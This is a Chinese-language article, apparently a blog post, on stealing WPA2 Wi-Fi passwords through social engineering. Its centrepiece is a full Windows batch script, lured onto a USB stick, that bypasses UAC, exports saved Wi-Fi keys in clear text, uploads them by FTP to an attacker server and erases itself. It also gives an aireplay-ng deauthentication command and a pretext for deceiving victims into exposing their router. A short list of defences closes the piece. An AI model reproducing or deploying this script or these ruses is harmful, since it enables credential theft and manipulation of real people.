常見社工破解WPA2密碼方法及防范措施
1. 前言
何為社工?社工是一種通過利用受害者心理弱點,如本能反應(yīng)、好奇心、同情心、信任、貪婪等進行諸如欺騙、盜取、控制等非法手段的一種攻擊方式。在無線安全中也可以利用社工做到許多非法操作。下面舉幾個利用社工盜取wpa2密碼的例子。
2. 移動存儲攻擊
某寶小容量u盤,在u盤中存放一個bat批處理文件,并命名為誘使人點開的標(biāo)題,如:windows電腦優(yōu)化、私人照片等等。其實bat文件的內(nèi)容是這個:
- @echo off
- >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
- if '%errorlevel%' NEQ '0' (
- goto UACPrompt
- ) else ( goto gotAdmin )
- :UACPrompt
- echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
- echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
- "%temp%\getadmin.vbs"
- exit /B
- :gotAdmin
- if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
- md c:\win
- netsh wlan export profile key=clear folder=c:\win
- echo open 服務(wù)器ip>C:\config.txt
- echo user 賬號>>C:\config.txt
- echo 密碼>>C:\config.txt
- echo mput c:\win\*.xml>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo yes>>C:\config.txt
- echo bye>>C:\config.txt
- ftp -n -s:"C:\config.txt"
- del C:\config.txt
- del C:\win\*.xml
- del %0
這個bat腳本會讀取本機連接過的wifi信息(包括密碼)打包到一個文件夾里并全部put到服務(wù)器上,然后刪除痕跡和自身防止服務(wù)器信息泄露。最后攻擊者就可以在自己的ftp服務(wù)器里挑選自己中意的wifi了。
攻擊演示:
打開此腳本
彈出cmd界面,1秒后消失(太快了不好截),bat腳本也隨之消失
查看ftp服務(wù)器
wifi信息已經(jīng)put上來了
進入服務(wù)器打開一個xml文件
就拿到了密碼
可以自己在里面添加功能使社工效果更好,例如腳本名稱命名為某某公司有獎問卷調(diào)查,并添加打開調(diào)查問卷的命令,使攻擊神不知鬼不覺。
3. 直接接觸受害者
(1) 使用Deauthentication攻擊
- aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的時候(這個時候普遍在使用網(wǎng)絡(luò))對受害者使用斷網(wǎng)攻擊,等一小時后去敲門,詢問網(wǎng)絡(luò)是否故障,詢問網(wǎng)絡(luò)是哪家公司配置的,然后聲稱自己的網(wǎng)絡(luò)也故障了,是一樣的公司,然后詢問報修電話并撥打,其實撥打的是其他人或根本沒有撥打,然后假裝是保修人員提示讓自己重啟路由器,攻擊者就可以接觸到受害者路由器,運氣好的話路由器背面有pin碼,就可以撤退了。如果沒有,攻擊者就進一步施壓,假裝被保修人員提示打開路由器管理界面在管理界面重啟路由器,乘機看到密碼。重啟完畢后手機ssh連接kali停止攻擊,造成重啟成功修復(fù)網(wǎng)絡(luò)的假象,然后撤退。
(2) 結(jié)合移動存儲攻擊,配合badusb,謊稱有重要文件需要發(fā)送然而手機沒電了,家里人還沒下班。第一天進公司不想留下壞印象,從而直接接觸受害者電腦,插入badusb,執(zhí)行bat腳本或木馬
(3) 謊稱自己是某某公司或某某大學(xué)的,正在進行網(wǎng)民安全意識的問卷調(diào)查,并將其中帶有提問wifi密碼的問卷遞交受害者,從而獲得wifi密碼
4. wifi釣魚
利用fluxion、wifiphisher等工具實施釣魚攻擊:
它們的大概原理是抓取受害者客戶端與wifi的握手包,對目標(biāo)客戶端實施wifi拒絕服務(wù)攻擊,發(fā)送大量解離包,然后偽造一個相同名稱的ap,受害者連接偽造的ap后會被解析到這個頁面:
受害者輸入密碼后會自動與抓取的握手包進行比對,若正確,則停止拒絕服務(wù)攻擊。網(wǎng)上有很多wifi釣魚的教程,這里就不再闡述。
4. 防御措施
- 綁定mac地址,設(shè)置白名單,只允許自己的機器連接wifi
- 隱藏wifi廣播,避免自己成為目標(biāo)
- 不要插入來路不明的u盤,不要打開來路不明的程序,不要連接來路不明的無線信號
- 盡量不讓陌生人接觸到自己的設(shè)備
- wifi最好使用wpa2加密,并使密碼復(fù)雜度越高越好,盡量別在密碼里使用和自己有關(guān)的信息
- 定期更換路由器管理界面密碼和wifi密碼
- 最好關(guān)閉路由器上的wps功能
- 盡量不使用wifi萬能鑰匙等類似軟件